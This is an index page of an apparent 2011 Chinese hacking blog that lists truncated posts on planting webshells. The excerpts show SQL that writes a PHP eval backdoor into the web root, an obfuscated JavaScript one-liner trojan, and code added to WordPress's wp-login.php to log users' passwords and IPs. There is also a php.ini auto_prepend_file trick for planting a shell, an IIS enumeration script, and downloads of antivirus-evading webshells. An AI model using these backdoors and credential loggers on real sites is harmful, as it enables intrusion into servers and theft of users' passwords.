aspx-webshell注册表浏览器

   
分类:工具 | 2011-12-10 | 撸过 2,519 次
2人扯蛋

上传好几个ASPX的webshell都被杀了

这个查看注册表竟然生存一下来了 不错

要的就赶紧下载吧

 

 

下载:reg[......]

继续阅读

MySQL导出一句话拿WebShell的方法

   
分类:安全 | 2011-11-9 | 撸过 7,008 次
0人扯蛋

文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):

Drop TABLE IF EXISTS temp; //如果存在temp就删掉
Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd]);?>'); //把一句话木马插入到temp表
Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查询temp表中的一句话[......]

继续阅读

加密一句话木马

   
分类:安全 | 2011-11-8 | 撸过 3,157 次
1人扯蛋
我原也以为这是ASCII码加密过的
73,50,114,133,114,112,130,129,114,45,127,114,126,130,114,128,129,53,47,121,47,54,50,75结果T00LS某牛
全部数字减13,然后十进制解密 

<script>
var sun=[73,50,114,133,114,112,130,129,114,45,127,114,126,130,114,128,129,53,47,121,47,54,50,75];
var temp=new Array();
for(var i=0;i<sun.length;[......]

继续阅读

webshell下记录WordPress登陆密码

   
分类:安全 | 2011-11-8 | 撸过 1,882 次
2人扯蛋

webshell下记录Wordpress登陆密码方便进一步社工
原处:http://81sec.com/read.php?115
Wordpress的密码破解可以说基本是没招了,悲剧只好采用记录密码了。
在文件wp-login.php中539行处添加:

 

 

// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n[......]

继续阅读

aspxspy的大马的查看站点做限制

   
分类:技术 | 2011-11-8 | 撸过 1,715 次
0人扯蛋

先介绍一下:

1.开发环境VS2008 + C#,兼容FrameWork1.1/2.0,基本实现代码分离,CSS方便参考了phpspy。
2.密码为32位MD5加密(小写) 默认为 admin.
3.全部采用POST方式提交数据,增强了隐蔽性。
4.增强了IIS探测功能,遍历IIS站点信息,绝对路径,多域名绑定,以及IIS账号密码。
5.增加了对指定文件的搜索功能。
6.修正了一些数据库操作的BUG。
7.增强了对注册表的读取8.修正了对端口的多线程扫描
9.增强了端口转发功能 

特别是:

增强了IIS探测功能,遍历IIS站点信息,绝对路径,多域名绑定,以及IIS账号密码。

这个功能[......]

继续阅读

NC提交备份方法

   
分类:安全 | 2011-10-17 | 撸过 998 次
0人扯蛋

这其实算是一种拿shell方法吧!!跟大家分享一下~~
很多时候我们进入网站后台,发现有备份功能,但并不能修改我们需要备份的文件地址,这个方法可以解决这类难题。。。高手就飞过吧~~
过程:
1、发现可以备份,但不能修改成我们需要备份的文件


[......]

继续阅读

后台单独生成php页面拿shell

   
分类:安全 | 2011-10-17 | 撸过 1,301 次
0人扯蛋

天群里一个鸟人丢个后台叫帮忙拿shell。一看是FCK,就各种去弄了...结果无功而返,PHP语言。过程就不说了,不是重点.后来在前台打开各种链接以及配合后台查看发现他的关于我们\招贤纳士只能的页面是独立的php页面.这就好办了。写个一句话即可。至于怎么写,我这就扯下。

看代码:

<div id="con660">
<div>
<h4>业务领域</h4>
<span>标题</span><br>
<br>
<span>标题2</span><br>
<div[......]

继续阅读

dedecms全自动获取WEBSHELL

   
分类:工具 | 2011-10-14 | 撸过 2,406 次
2人扯蛋

很好很给力,上图:

 

下载:dede[......]

继续阅读

利用php.ini拿shell及防范

   
分类:安全 | 2011-10-5 | 撸过 1,491 次
1人扯蛋

1.把error_log设置到web目录

~例如hackxl.php

2.auto_prepend_file设为一句话

~比如设为<?php eval($_REQUEST[#]);?>

3.然后访问任意php php文件后会因为找不到auto_prepend_file的文件而报错,而会产生报错;把<?php eval($_REQUEST[#]);?>写入了hackxl.php

auto_prepend_file指令的作用是包含文件可以像使用include()语句包含的文件一样;也就是,如果该文件不存在,将产生一个警告也就就报错。

不过php会对error输出[......]

继续阅读

webshell下可以命令时跨站最好办法

   
分类:安全 | 2011-10-3 | 撸过 1,261 次
0人扯蛋

今晚在搞个黑客站的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。
无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就再帖下,并说明用法!

Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) The[......]

继续阅读